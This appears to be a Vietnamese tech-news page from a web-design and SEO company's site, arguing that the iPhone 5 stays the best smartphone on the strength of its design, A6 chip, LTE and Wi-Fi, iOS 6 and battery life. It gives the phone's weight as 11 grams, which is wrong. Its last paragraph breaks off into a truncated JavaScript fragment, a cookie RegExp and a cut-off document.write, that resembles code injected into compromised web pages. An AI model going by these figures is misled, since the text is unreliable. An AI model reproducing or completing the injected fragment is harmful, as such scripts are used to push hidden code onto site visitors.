Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Những điểm chứng minh iPhone 5 vẫn là số 1

Những điểm chứng minh iPhone 5 vẫn là số 1

Mỏng hơn, nhẹ hơn, màn hình cảm ứng lớn hơn, phần cứng mạnh mẽ hơn iPhone 4S là những từ ngữ để miêu tả iPhone 5, chiếc smartphone HOT nhất hiện nay.

iPhone 5 là chiếc smartphone HOT trên thị trường điện thoại

Dưới đây sẽ là 5 yếu tố giúp iPhone 5 tiếp tục vẫn là một chiếc smartphone HOT nhất hiện nay, bất chấp sự có mặt của iPhone 5s trên thị trường.

Thiết kế sang trọng và ấn tượng

Nếu nhìn từ xa thì thiết kế của iPhone 5 và iPhone 4S không thật sự là khác biệt, ngoại trừ điểm nhấn là màn hình dài hơn. Phần trước của máy vẫn được sử dụng lớp kính như các phiên bản trước đây. Lớp vỏ kim loại được phủ đến tận mép màn hình, tạo cảm giác giống như thiết bị được đúc thành một khối đồng nhất.

iPhone 5 sở hữu một thiết kế vỏ nhôm nguyên khối

iPhone 5 có khối lượng là 11 gram, nhẹ hơn iPhone 4S 20% nên bạn sẽ nhận ra sự khác biệt. Mặc dù khá là mỏng manh, nhưng rất nhiều khách hàng đã khen ngợi sản phẩm vì dễ dàng sử dụng đơn giản chỉ bằng 1 tay và cầm lâu thiết bị trên tay không có cảm giác mỏi như các phiên bản trước. Ngoài ra, với chiều cao mới của chiếc điện thoại này sẽ giúp cho màn hình có kích thước 4 inch với độ phân giải 1136 x 640 có thêm nhiều không gian để hiển thị hình ảnh, nội dung tốt hơn với những chuẩn HD.

Màn hình cảm ứng của máy được nhiều người dùng đánh giá là nhanh nhạy hơn so với 4S nhiều, camera phụ hỗ trợ cho tính năng FaceTime chuẩn HD cung cấp hình ảnh sắc nét và camera 8 “chấm” cho chất lượng hình ảnh sắc nét.

Chip xử lý được nâng cấp mạnh mẽ hơn

Apple đã trang bị cho sản phẩm của mình một con chip xử lý lõi kép A6 nhỏ hơn thế hệ chip A5 của iPhone 4S 22% và tiết kiệm được không gian nhiều hơn, đồng thời mang lại tốc độ xử lý nhanh gấp đôi 4S.  Dù chỉ được tích hợp chip lõi kép nhưng nó đang thể hiện một sức mạnh rất đáng nể khi so sánh với một loạt các thiết bị chạy Android dùng chip lõi tứ. Ngoài ra, khả năng xử lý của chip đồ họa rất mạnh mẽ khi mà nó chỉ khuất phục trước iPad 2013 và vượt xa hàng loạt các đối thủ cạnh tranh.

Tốc độ kết nối nhanh chóng

Máy có thể thích nghi với mạng GSM/EDGE chậm chạp cho đến các mạng do đọng băng thông rộng 3G, 4G LTE.

Tốc độ kết nối của iPhone 5 rất nhanh

Nếu xét về kết nối 3G thì tốc độ truy cập 3G của iPhone 5 dễ dàng vượt qua 2 người tiền nhiệm đi trước và cả iPad 2012. Bên cạnh đó, việc được trang bị mạng 4G LTE đã giúp máy trở thành một trong những chiếc smartphone có tốc độ truy cập Internet nhanh nhất hiện nay. 

Với khả năng dò tìm Wifi đa chuẩn đã tốt hơn nhiều so với các dòng điện thoại cảm ứng thế hệ trước đây, đặc biệt với chuẩn 802.11n mới nhất hiện nay thì máy đã có cả băng tần 2.4 GHz và băng tần kép 5 GHz, tốc độ lên tới 150 Mbps, kết nối Bluetooth 4.0 và GLONASS.

Hệ điều hành iOS 6

Đây được xem là nguyên nhân chính giúp các dòng sản phẩm mang thương hiệu Apple thành công vang dội và iPhone 5 không phải là một ngoại lệ. Hệ điều hành mới mang đến một môi trường tuyệt vời hơn bao giờ hết: hoạt động tốt, hỗ trợ nhiều chức năng mới giúp người dùng khai thác các chức năng triệt để hơn nữa. Ngoài ra, với ứng dụng Apple Maps do chính Apple tự phát triển đã có thêm nhiều cải tiến.

Đối với thị trường Việt Nam, ngoài các chức năng cơ bản, bản đồ số còn hỗ trợ hướng dẫn đi đường, điều hướng, tìm kiếm cục bộ tại vị trí hiện tại. Tuy nhiên, nếu thiếu vắng các chức năng hấp dẫn như hình ảnh đồ họa 3D của các tòa nhà, lưu lượng giao thông, thông tin các doanh nghiệp.

Gia tăng thời lượng pin

Không gian trống giúp Apple có thể gia tăng thời lượng pin, cụ thể là iPhone 5 có 8 giờ đàm thoại và lướt web khi dùng mạng 3G, 10 giờ lướt web bằng Wifi, 10 giờ xem video, 40 giờ nghe nhạc liên tục và thời gian chờ lên đến 225 giờ. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘